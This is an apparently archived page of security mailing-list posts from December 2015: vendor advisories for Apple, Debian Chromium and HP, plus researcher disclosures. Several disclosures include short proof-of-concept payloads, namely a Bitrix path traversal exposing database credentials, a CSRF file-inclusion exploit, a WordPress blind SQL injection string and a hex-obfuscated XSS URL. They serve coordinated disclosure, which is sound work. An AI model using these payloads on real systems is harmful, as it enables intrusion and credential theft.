APPLE-SA-2015-12-08-4 watchOS 2.1

2015-12-10 Thread Apple Product Security 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-4 watchOS 2.1

watchOS 2.1 is now available and addresses the following:

AppSandbox
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may maintain access to Contacts
after having access revoked
Description:  An issue existed in the sandbox's handling of hard
links. This issue was addressed through improved hardening of the app
sandbox.
CVE-ID
CVE-2015-7001 : Razvan Deaconescu and Mihai Bucicoiu of University
POLITEHNICA of Bucharest; Luke Deshotels and William Enck of North
Carolina State University; Lucas Vincenzo Davi and Ahmad-Reza Sadeghi
of TU Darmstadt

Compression
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  An uninitialized memory access issue existed in zlib.
This issue was addressed through improved memory initialization and
additional validation of zlib streams.
CVE-ID
CVE-2015-7054 : j00ru

CoreGraphics
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-7105 : John Villamil (@day6reak), Yahoo Pentest Team

CoreMedia Playback
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Visiting a maliciously crafted website may lead to arbitrary
code execution
Description:  A memory corruption issue existed in the processing of
malformed media files. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-7075

dyld
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A segment validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-7072 : Apple

FontParser
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  Multiple memory corruption issues existed in the
processing of font files. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero
Day Initiative

GasGauge
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-6979 : PanguTeam

ImageIO
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  Processing a maliciously crafted image may lead to arbitrary
code execution
Description:  A memory corruption issue existed in ImageIO. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-7053 : Apple

IOHIDFamily
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-7111 : beist and ABH of BoB
CVE-2015-7112 : Ian Beer of Google Project Zero

IOKit SCSI
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A malicious application may be able to execute arbitrary
code with kernel privileges
Description:  A null pointer dereference existed in the handling of a
certain userclient type. This issue was addressed through improved
validation.
CVE-ID
CVE-2015-7068 : Ian Beer of Google Project Zero

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local application may be able to cause a denial of service
Description:  Multiple denial of service issues were addressed
through improved memory handling.
CVE-ID
CVE-2015-7040 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7041 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7042 : Lufeng Li of Qihoo 360 Vulcan Team
CVE-2015-7043 : Tarjei Mandt (@kernelpool)

Kernel
Available for:  Apple Watch Sport, Apple Watch, Apple Watch Edition,
and Apple Watch Hermes
Impact:  A local user may be able to execute arbitrary code with
kernel privileges
Description:  An issue existed in the parsing of mach messages. This
issue was addressed through improved validation of mach messages.
CVE-ID
CVE-2015-7047 : Ian Beer of Google

[SECURITY] [DSA 3415-1] chromium-browser security update

2015-12-10 Thread Michael Gilbert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3415-1   secur...@debian.org
https://www.debian.org/security/  Michael Gilbert
December 09, 2015 https://www.debian.org/security/faq
- -

Package: chromium-browser
CVE ID : CVE-2015-1302 CVE-2015-6764 CVE-2015-6765 CVE-2015-6766
 CVE-2015-6767 CVE-2015-6768 CVE-2015-6769 CVE-2015-6770
 CVE-2015-6771 CVE-2015-6772 CVE-2015-6773 CVE-2015-6774
 CVE-2015-6775 CVE-2015-6776 CVE-2015-6777 CVE-2015-6778
 CVE-2015-6779 CVE-2015-6780 CVE-2015-6781 CVE-2015-6782
 CVE-2015-6784 CVE-2015-6785 CVE-2015-6786

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2015-1302

Rub Wu discovered an information leak in the pdfium library.

CVE-2015-6764

Guang Gong discovered an out-of-bounds read issue in the v8
javascript library.

CVE-2015-6765

A use-after-free issue was discovered in AppCache.

CVE-2015-6766

A use-after-free issue was discovered in AppCache.

CVE-2015-6767

A use-after-free issue was discovered in AppCache.

CVE-2015-6768

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6769

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6770

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6771

An out-of-bounds read issue was discovered in the v8
javascript library.

CVE-2015-6772

Mariusz Mlynski discovered a way to bypass the Same Origin
Policy.

CVE-2015-6773

cloudfuzzer discovered an out-of-bounds read issue in the
skia library.

CVE-2015-6774

A use-after-free issue was found in extensions binding.

CVE-2015-6775

Atte Kettunen discovered a type confusion issue in the pdfium
library.

CVE-2015-6776

Hanno Böck dicovered and out-of-bounds access issue in the
openjpeg library, which is used by pdfium.

CVE-2015-6777

Long Liu found a use-after-free issue.

CVE-2015-6778

Karl Skomski found an out-of-bounds read issue in the pdfium
library.

CVE-2015-6779

Til Jasper Ullrich discovered that the pdfium library does
not sanitize "chrome:" URLs.

CVE-2015-6780

Khalil Zhani discovered a use-after-free issue.

CVE-2015-6781

miaubiz discovered an integer overflow issue in the sfntly
library.

CVE-2015-6782

Luan Herrera discovered a URL spoofing issue.

CVE-2015-6784

Inti De Ceukelaire discovered a way to inject HTML into
serialized web pages.

CVE-2015-6785

Michael Ficarra discovered a way to bypass the Content
Security Policy.

CVE-2015-6786

Michael Ficarra discovered another way to bypass the Content
Security Policy.

For the stable distribution (jessie), these problems have been fixed in
version 47.0.2526.73-1~deb8u1.

For the testing distribution (stretch), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 47.0.2526.73-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQQcBAEBCgAGBQJWaNtaAAoJELjWss0C1vRz6d8f/ixjSiBDXKjBnjtGs0dr2nRK
ruz1uHJWHqSElOAc/qD100VJk/1q2vR4JU5XR1j5eBj03MZNI3SJnuNMHoTmr3wZ
gj6BvhDBRiOEvgRTCnVazjNU5ep+8XOw7b2L8fhy+BliS4sOBH9l/HFbGsNm9exw
6xgxiy7aHkY1IqcncL/UmJrJcgGNrEDzvcijNCxM6sMrveSGYjLnhO4BiIu6ASHb
zs6KtdYuyOnja3cL5Rq6Qq9svx4QumjULqAIN6/RLYzzYe6+ZWaF+i0V+0OYfL6P
RttBW4OKYLbNezT9206ujsjoWvDKZJ6vZ1fYGcqNlI/CrU7IskVs1IcNkB8iRrhY
AK8Q1KeEmFPaWCa+60hdQ0K1M6rGR+FVyA+gfE4bu1DK1DS1NXE6HQZOvihkxFMU
yN9i2iX0pb+DpZMQmJf4nv78ASzw0V1V+x2p8+ccyIKEYqnP4mSFo/61TvuA6fJm
6D7TLWT8DpZ5Po0LaIAUzwwmDAgQi82rWDgL2c7ebX/HeIZZ9MnBuzSMitjR05sQ
4uLUl8MkVnP5azWCBNATUfDvNjzlNiKlwCnoRONfF0+tRBzUpWGYCA4jLGYMcgxc
Kx3bdP6+r4HyfjebQ5M//FVj37MbLH1YwMofeO7muuIuwMwP27UgbTRPJqjuGypS
MSHyyFkmaj/RvDoIgkM4BFyc9xzejhGMnDeg0qlFS4xocdkEGUKjr8c+VUhzMpAM
T+3Kw4lEtTXy09ttZ4VP63OOelUGd2i32ir2PvvU+3QwjArjAuBsvBlrFwnkJWqC
5UUPQ+lA82NG3n0JYqHu5QJEUQVyhibbg3yzXxz0LitaJC77NoPJIxahz7RDxNCk
Ox/imWUapkHZWO8ewcuHPgIf7OJarXOOn6cAaDH2J46WUdLTnP2ghOYwTm0xZuHh
78aSCEqnYVImepwXv9ndd0BR3S9etnOKmmouwFcsMiZd25ASOCN9zVUrfPki7CIz
LZRO1s895cR4Wa9/Gx2rja1wJqUrdYA4APJZGbaU8dZBmnEfe1WFSMP4dfp8KdZQ
iSzY6/339uzlE6Q/aWDvYBGTFS2+Gf3FxnlhAGdOT0TLRt8GvVIt2YjyGRET7UUh
zHpxImL0bY/RrPOaRaUtEcZJrRMgLT7ZPIcIeqZgOKHn8+NRcg45JORuDQ3ibhba
cqNZQsOZbNAsTF0D32T/BM1rdsu0BoK/Z8FFE/WbrvP+D43wU0m9jjRDNxv2ZQ9n
ZELwH6kWxLAVapxJoe2CHmfFxB6rYnQJxsmDh8OLqzqBpcVxEkjlX/iRBP8cFf8O

MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow

2015-12-10 Thread submit 
Hi @ll,

Today Apple fixed buffer overflow issue in LIBC/FTS (CVE-2015-7039).

Patch available for: 
- OS X El Capitan v10.11 and v10.11.1
- iPhone 4s and later,
- Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes
- Apple TV (4th generation)

Impact:  Processing a maliciously crafted package may lead to arbitrary code 
execution
Description:  Multiple buffer overflows existed in the C standard library. 
These issues were addressed through improved bounds

Conception and description of issue here:

https://cxsecurity.com/issue/WLB-2015100149

Best Regards,
Maksymilian Arciemowicz (http://cert.cx)
https://cxsecurity.com - Independent Information

[CVE-2015-7706] SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting Vulnerabilities

2015-12-10 Thread Vogt, Thomas 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

secunet Security Networks AG Security Advisory

Advisory: SECURE DATA SPACE API Multiple Non-Persistent Cross-Site Scripting 
Vulnerabilities

1. DETAILS
- --
Product: SECURE DATA SPACE 
Vendor URL: www.ssp-europe.eu
Type: Cross-site Scripting[CWE-79]
Date found: 2015-09-30
Date published: 2015-12-09
CVSSv2 Score: 4,3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
CVE: CVE-2015-7706


2. AFFECTED VERSIONS
- 
All product versions (Online, Dedicated, For Linux/Windows) in 
Web-Client v3.1.1-2  
restApiVersion: 3.5.7-FINAL
sdsServerVersion: 3.4.14-FINAL


3. INTRODUCTION
- ---
"The highly secure business solution for easy storage, synchronization, 
distribution and management of data - regardless of location or device"

(from the vendor's homepage)


4. VULNERABILITY DETAILS
- 
The Secure Data Share version v3.1.1-2 is vulnerable to multiple 
unauthenticated Non-Persistent Cross-Site Scripting vulnerabilities when 
user-supplied input is processed by the server.[0]  

#1 Proof-of-Concept:
https://example.com/api/v3//public/shares/downloads/111"}

#2 Proof-of-Concept(authType parameter):
POST /api/v3/auth/login

[security bulletin] HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure of Information

2015-12-10 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c04918653

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04918653
Version: 1

HPSBMU03520 rev.1 - HP Insight Control server provisioning, Remote Disclosure
of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2015-12-09
Last Updated: 2015-12-09

Potential Security Impact:  Remote disclosure of information

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified with HP Insight
Control server provisioning that could be exploited remotely resulting in
information disclosure.

References:  CVE-2015-6858
PSRT102928

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Insight Control server provisioning Prior to v7.5.0 RabbitMQ

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2015-6858(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

Hewlett Packard Enterprise has provided HP Insight Control server
provisioning version 7.5.0 to resolve this vulnerability:

http://www.hp.com/go/insightupdates

HISTORY
 Version:1 (rev.1) - 9 December 2015 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2015 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBAgAGBQJWaJqYAAoJEGIGBBYqRO9/3NQIAJ/viczjYCY6Ne0a8qJvECh4
ylz17l013bvEFUUeSVR1HxkMIZwEEOVi7G64HrS3wSGd/UUOkY1mM9N05bFkUbD4
E6pspSQBMoQQuhRQnwEtYALDvow1aGQEN7Kh2KHXZeEi2IN6vC+RzfFS5VNfKwq1
mL4slpMGVTIzkgJVvle3nFiHo84cPWy7dDUqG/l8Uiukc71Z8mhjzrdKRB0Jgg6X
uFpAn+0vPwel2SjfRGQI4R8t4v+qlX144Xk0Yy0XhhZNXS3bpfkiS/GAXwKtNt/s
KDpmPRG9WxVP0kxf8fQTbaza3UMwqeUgaxOl6VSPFxY9fFdOKzfdjXYxzI9yCgE=
=ioKE
-END PGP SIGNATURE-

Path Traversal via CSRF in bitrix.xscan Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research 
Advisory ID: HTB23278
Product: bitrix.xscan Bitrix module
Vendor: Bitrix
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 24, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8357
Risk Level: Medium 
CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.xscan 
Bitrix module, intended to discover and neutralize malware on the website. The 
vulnerability can be exploited to change extension of arbitrary PHP files on 
the target system and gain access to potentially sensitive information, such as 
database credentials, or even make the whole website inaccessible.

The vulnerability exists due to absence of filtration of directory traversal 
characters (e.g. "../") passed via "file" HTTP GET parameter to 
"/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker 
can upload a file with malicious contents, pass this file to vulnerable script 
along with name of the file to rename. As a result, the vulnerable script will 
change extension of the given file from ".php" to ".ph_”. These actions will 
make the web server treat this file as a text file and display its contents 
instead of executing it. 

To demonstrate the vulnerability follow the steps below:

1) Chose arbitrary image file and modify it by appending eval() PHP function at 
the end of the file. We need this, because the file will be renamed only if it 
contains potentially dangerous content.
2) Upload this file using standard CMS functionality, for example as an image 
for your profile.
3) Obtain the name of the image you have uploaded. You can do it using your 
profile. In our example the images had the following path: 
"/upload/main/77f/image.jpg".
4) Construct the exploit payload using path to the image and the file you want 
to view. As a demonstration we chose to view contents of 
"/bitrix/.settings.php" file, since it contains database credentials:

file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

5) Use the following PoC code to reproduce the vulnerability:

http://[host]/admin/bitrix.xscan_worker.php?action=prison=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php;>

As a result, the vulnerable script will rename "/bitrix/.settings.php" into 
"/bitrix/.settings.ph_", which makes it readable by anonymous users:

http://[host]/bitrix/.settings.ph_

Access to vulnerable modules requires administrative privileges, however the 
vulnerability can be used by anonymous users via CSRF vector. Steps 1-4 do not 
require administrative or special privileges and can be performed by any user, 
who can register at the website or upload an image. 

---

Solution:

Update to bitrix.xscan module 1.0.4

---

References:

[1] High-Tech Bridge Advisory HTB23278 - 
https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in 
bitrix.xscan Bitrix Module
[2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - 
Module for Bitrix CMS that can detect Trojans on your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

PHP File Inclusion in bitrix.mpbuilder Bitrix Module

2015-12-10 Thread High-Tech Bridge Security Research 
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 25, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical 
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in 
bitrix.mpbuilder Bitrix module, which can be exploited to include and execute 
arbitrary PHP file on the target system with privileges of the web server. The 
attacker will be able to execute arbitrary system commands and gain complete 
control over the website.

Access to vulnerable modules requires administrative privileges, however the 
vulnerability can be used by anonymous users via CSRF vector.
 
The vulnerability exists due to insufficient filtration of "work[]" HTTP POST 
parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it 
in the include() PHP function. A remote attacker can include and execute 
arbitrary local file on the target system.

A simple exploit below will include and execute "/tmp/file" file:

http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; 
method="post" name="main">






In a real-world scenario an attacker can use session files to execute arbitrary 
PHP code. For example, an attacker can change name in his profile to  and create a CSRF exploit that will pass arbitrary 
commands and execute them on the system. The PoC code below executes /bin/ls 
command using previously created session file with malicious "NAME" value:


http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog; 
method="post" name="main">








---

Solution:

Update to bitrix.mpbuilder module 1.0.12

---

References:

[1] High-Tech Bridge Advisory HTB23281 - 
https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in 
bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - 
https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module 
for software developers. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

WordPress Users Ultra Plugin [Blind SQL injection] - Update

2015-12-10 Thread Panagiotis Vagenas 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description


One can perform an SQL injection attack simply by exploiting the
following WP ajax actions:

1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`

POST parameters that are exploitable in each action respectively:

1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`

In case #7 a user can also change the gallery name, description and
visibility by setting POST parameters `gal_name`, `gal_desc` and
`gal_visibility` respectively.

In case #8 `photo_id` is first casted to integer and a query to DB is
performed. If results are returned then for each result a new query is
performed without casting the `photo_id` to integer. So if an attacker
knows a valid video id then it can perform the attack in the second
query. This achievable because `

In case #9 a user can also change the photo name, description, tags and
category by setting POST parameters `photo_name`, `photo_desc`,
`photo_tags` and `photo_category` respectively.

In case #10 a user can also change the video name, unique id and type by
setting POST parameters `video_name`, `video_unique_id` and `video_type`
respectively.

Because function wpdb::get_results() and wpdb::query() are in use here,
only one SQL statement can be made per request. This holds severity of
the attack low.
In addition all actions are privileged so the user must have an active
account in vulnerable website, in order to perform the attack.


PoC


Send a post request to
`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data:
`action=edit_video_id=1 and sleep(5) `

Timeline


2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues

Solution

 
Upgrade to version 1.5.63
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iQIcBAEBAgAGBQJWZ2ZhAAoJEBe10gGXVLphzFUP/3CkzkaF9sQgl3hZo2QaWzsu
kq43dBtVDQZjBQp5Qs2JqFYO7yc9FWRSZyD38CrWWtCwqK8DlMFxZYoAqwt45lEx
lYxiOUCO98BXeAUXy/DeS+gY2dgnt0FvC0SKpN59OS95Nn6EBaCcKCczavn46zxm
rPGr7GzORO7wqObgL16Rew98hmVsf+nYwFNvMBfq7NQIZQzD065S7dQKt33PNjey
u4/I3HFW7tKljVdait+LObfvLTA/TAxeFDRQhM5uRN2UGBBU5AWHwZK4JeayEaw4
i3MJPe6ZggXn3BMdrBzuySvMWuX8cEwMzJW9dKzwOz+97iZYiS5UFGH3PbT2VV0Y
It/uFdnqn6Z+f7rLRQdYpHImivkRirX6YgJ9gbT7ZqTJwrF2cTGykl8qkcddkSwU
Tt517YGXrw/8fgzRRH0/sRoK2JFq/V+pr6ksOEi/ppKdQrQaz+Kuy4lUglgN7NtC
Vlyma9GQnkPl5IAbCT18dNv8p6PcR4zcU0bKZufW2bfnEoaXVsL1vjjZ9oz9xAwX
q6i/4cGKsG7KwcSBqUNOw3SAXJjqBJhHQHrTw2TIb3bHLUh8/fGvCqQsRhfPUAf0
uAkfBQ5fXjtaKQcXif2LwjSgsaVhaiJY4Fp946mPn7E32jEswdcKrpaBA9WoPGgG
OJG27/ImQ9GJuXQV/uFW
=Fpqd
-END PGP SIGNATURE-

XSS vulnerability in Intellect Core banking software - Polaris

2015-12-10 Thread msahu 
[+] Credits: Mayank Sahu
[+] Email: ms...@controlcase.com


Vendor:

Intellect Design Arena (Polaris)

Product:
===
Intellect Core banking software (Armar module)

Vulnerability Type:
==
Cross site scripting - XSS

CVE Reference:
==
CVE-2015-6540

Vulnerability Details:
==
Application allows arbitrary client side JS code execution on victims who click 
our infected link. Session ID and data theft may follow as well as possibility 
to
bypass CSRF protections, injection of iframes to establish communication 
channels etc.
The vulnerability exist after login into application.

XSS Exploit code(s):
===

http://Server-address:7001/AAL/LoginAfter.jsp?page=Logout.jsp%27|[window[%27location%27]%3D%27\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x27\x43\x43\x27\x29%27]%2B%27


Disclosure Timeline:
=
Vendor Notification: September 21, 2015 
December 09, 2015  : Public Disclosure


Exploitation Technique:
===
Remote

Severity Level:

High


Description:
=
Request Method(s):  [+] GET
Vulnerable Product: [+] Intellect Core banking solution (Armor)
Vulnerable Parameter(s):[+] page

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by Mayank Sahu

Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile Knowledge)

2015-12-10 Thread securityresearch 
Original:
http://securityresearch.shaftek.biz/2015/12/goarro-and-other-taxi-hailing-apps-did-not-use-ssl.html

CERT Advisory:
https://www.kb.cert.org/vuls/id/439016

Advisory: Arro and Other Android Taxi Hailing Apps Did Not Use SSL (Mobile 
Knowledge)

Overview
Arro and possibly over 100 other Android taxi hailing apps did not SSL to 
secure communications between the application and its servers.

Background
Arro is a taxi hailing service allowing users to hail yellow taxis in New York 
from their smartphones. The service also allows users to pay for their ride via 
the application while they are in a taxi. The underlying technology is a white 
branded version of an application called Taxi Hail, made by a company called 
Mobile Knowledge, in Ottawa, Canada, a subsidiary of Creative Mobile 
Technologies, LLC (CMT) of New York, NY. Both are providers of technology 
solutions for the taxi industry. At least 100 other white branded taxi 
applications run on the same platform as Arro, with a link to a non-exhaustive 
list appearing later in this document.

Details
While monitoring network traffic from an Android smartphone, we observed that 
most communications between the Arro Android application and servers was 
unencrypted and did not use SSL. Instead, regular HTTP calls were being used. 
Further investigation showed that the underlying application and servers were a 
white branded version of TaxiHail, developed by Mobile Knowledge.

Information observed included:
Username and passwords for the users of the application
User profile including address and phone number
Credentials for various APIs and payment gateways used by the application
Latitude and longitude of the user requesting a taxi
Last four digits and expiration date of the user's credit cards on file
When adding a new credit card - full credit card information
Payments were made via a separate gateway that uses SSL and were not at risk. 
However, adding credit cards would be done without SSL. 

A secondary minor issue was also discovered. The GoArro app created a text log 
on the SD Card of the device being tested. This log, located in 
"/TaxiHail/errorlog.txt" contained GPS locations for the user, which would 
accessible to applications on the same phone without location access. This 
issue has also been fixed.


References
Arro website: https://www.goarro.com/ 
CERT/CC ID: VU# 439016

CMT website: http://creativemobiletech.com/
List of white branded apps: 
https://play.google.com/store/search?q=com.apcurium.MK=apps=en
TaxiHail website: 
http://www.mobile-knowledge.com/products/passenger-solutions/taxihail/

Credits
Thank you to Garret Wasserman of CERT/CC for helping to communicate with the 
vendors.

Timeline
2015-10-14: Arro notified
2015-10-14: Initial vendor response
2015-10-15: Followup communications to Arro, no response
2015-10-20: CERT/CC notified
2015-10-23: CERT/CC response
2015-11-06: Mobile Knowledge acknowledged the problem via CERT/CC
2015-11-30: Fix deployed by vendor
2015-12-01: Fix confirmed
2015-12-08: Public disclosure, coordinated with CERT/CC

Version Information
Version 3
Last updated on 2015-12-07

APPLE-SA-2015-12-08-1 iOS 9.2

2015-12-10 Thread Apple Product Security 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

APPLE-SA-2015-12-08-1 iOS 9.2

